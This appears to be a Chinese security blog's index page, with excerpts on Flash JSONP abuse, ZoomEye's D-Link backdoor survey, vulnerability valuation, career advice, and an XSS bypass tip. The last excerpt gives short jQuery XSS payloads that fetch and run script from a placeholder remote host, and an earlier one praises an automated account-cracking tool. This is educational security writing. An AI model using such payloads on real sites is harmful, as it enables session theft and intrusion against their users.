平时工作过于忙碌,技术的敏感度稍显滞后,好在隐隐感觉黑哥与小熊在群里提到的Flash 0day特性(CVE-2014-4671)具备非常大的价值,于是保存了笔记,晚上抽空断断续续研究了下,才意识到这个0day的价值。

原文链接:
http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/

乌云昨天出了个翻译:
http://drops.wooyun.org/tips/2554

Continue reading

我去年写过这个观点,可以看看《有一种黑客叫做工具党》。

面对我们想拿下的资源,我们得具备足够的细心与全面的观察,善于使用一些工具也是很关键的,熟练编程后,总会打磨出最适合自己的一些组件,快速组合就能编写一个针对性的攻击程序出来。

这个攻击程序在线程池模式下高效破解目标资源,比如针对某资源网站,5分钟内就可以在小概率而大样本的前提下暴力破解出一些有效的账号,然后登录->批量下载自己想要的资源,这一切都可以自动化完成。


KCon V3 8月下旬就要举办了,下周可以敲定具体时间和地点,演讲者全部搞定,干货十足,欢迎各位关注我的消息;)

为了增强微信公众号「Lazy-Thought」的体验,也为了我归档自己的文章,我增加了持久目录:

http://zhuanlan.zhihu.com/evilcos/19691465

对,放到了知乎专栏里,这在微信里兼容非常不错,而且稳定,我真担心我自己的博客哪天抽风……

我也松了口气,以后我的动态就这样简洁起来了;)如果你常用微信就关注我的微信公众号「Lazy-Thought」,如果你不常用,就定期查看目录里的更新吧……

我收到一个同学给我的邮件问了个在我看来属于“太阳系”级的难题,比宇宙终极难题还差那么些^^

他问:
—————–
这几天一直挺困惑。说下我的问题,你有空的时候帮我解答下吧。
今天问自己个问题,找个自己的特长现在开始发展它。
基本上以后主要就靠这个特长工作。
但我不知道自己到底对什么非常感兴趣,并能足以支撑我发展研究下去。
我现在对很多都很有兴趣,这个好玩的程序,渗透个网站,XSS,偶尔挖洞,看见移动设备安全觉得也挺好玩,那些设备安全也很吸引人,木马什么的也很神奇,总之就是好奇的太多。不想自己对什么都好奇的都碰碰,没有自己真正擅长的点,最后到公司只能由人家给我分配岗位,做到最后发现不是真正有兴趣的。
想请师傅综合一下现在安全方面的发展情况,什么比较缺,帮我分析一下我这怎么办。实在解决不了了。
很苦恼。
—————–
Continue reading

我们在微信(网站安全中心)上发了文《ZoomEye.org关于D-Link后门的统计分析报告》

上线了D-Link后门全球分布地图:http://www.zoomeye.org/lab/dlink

此刻开始,我才觉得我们的大数据有了个踏实的落脚点了(虽然历史上好多次踏实的,但是这次的踏实意义不一样)。我在大数据与安全有很多感悟,这是那些从来没玩过这个的人无法理解的,这种感悟能促使我能推进做出更多有趣的东东。ZoomEye团队不错:)

Continue reading

最近一直在知乎游荡,假期没啥事。
看到有同学@我,问:

大家来研究探讨一下,网页游戏攻防技术。必定,这个话题很敏感。目前,网页游戏已经很多了,会不会被黑产盯上?网页游戏会不会被黑掉,数据库会不会泄露?

我的回答如下:

这个得游戏安全同学来回答更好,不过我说下我的一些hacking心得吧。

Continue reading

今天在知乎看到有人问:

在这几天看了余弦的《Web前端黑客技术揭秘》。但是其中的代码全都看不懂,所以来知乎请教各位应该在学习XSS前我应该有什么基础?

这个问题我遇到好些,这里在知乎一并回答了,给大家表个态:

可惜了,我没下决心认真照顾好入门的同学。第一次写书也造成书的跳跃性有些夸张,还望吃力的同学谅解,因为我肯定这本书有足够的含金量。
Continue reading

最近一段时间,知道创宇的wsl小伙伴们发出了一个疑问:

我给tsrc提交的漏洞和xxx是一样的啊,为什么我的分少?

这个小伙伴的疑问的问题在于,没搞清楚漏洞的价值,漏洞价值体现在漏洞影响上,几个维度:
1. 漏洞本身的危害,比如一般情况下SQL的危害大于XSS;
2. 漏洞的易利用程度,一步搞定目标?还是要结合社工等,N步搞定目标,这个决定了成功率;
3. 目标群体大小,QQ群体规模>企业QQ;
4. 目标本身的价值,一般情况下,企业QQ>普通QQ,如你是要搞Q币,那就是普通QQ>企业QQ;
5. 社会影响面,如果被炒作了……这点可以忽略,要不然太复杂了;

Continue reading

后台灰盒+exp被限制40字符+script等标签被过滤。

很多人祭出0day bypass,没必要。先分析场景。最爽的是我看到场景使用了jquery,在昨天的一个攻击场景下,我推测那后台用jquery是必然的。

于是简短强悍的exp如:

1. eval($.get('//xxxx.com'))
2. $.getScript('//xxx.com') // 这个最牛逼,我当时没意识到,pw实战发现

思想是:攻击得原生态,依赖场景,这个思想在我们那本《Web前端黑客技术揭秘》第七章有鲜活说法。

大家举一反三吧。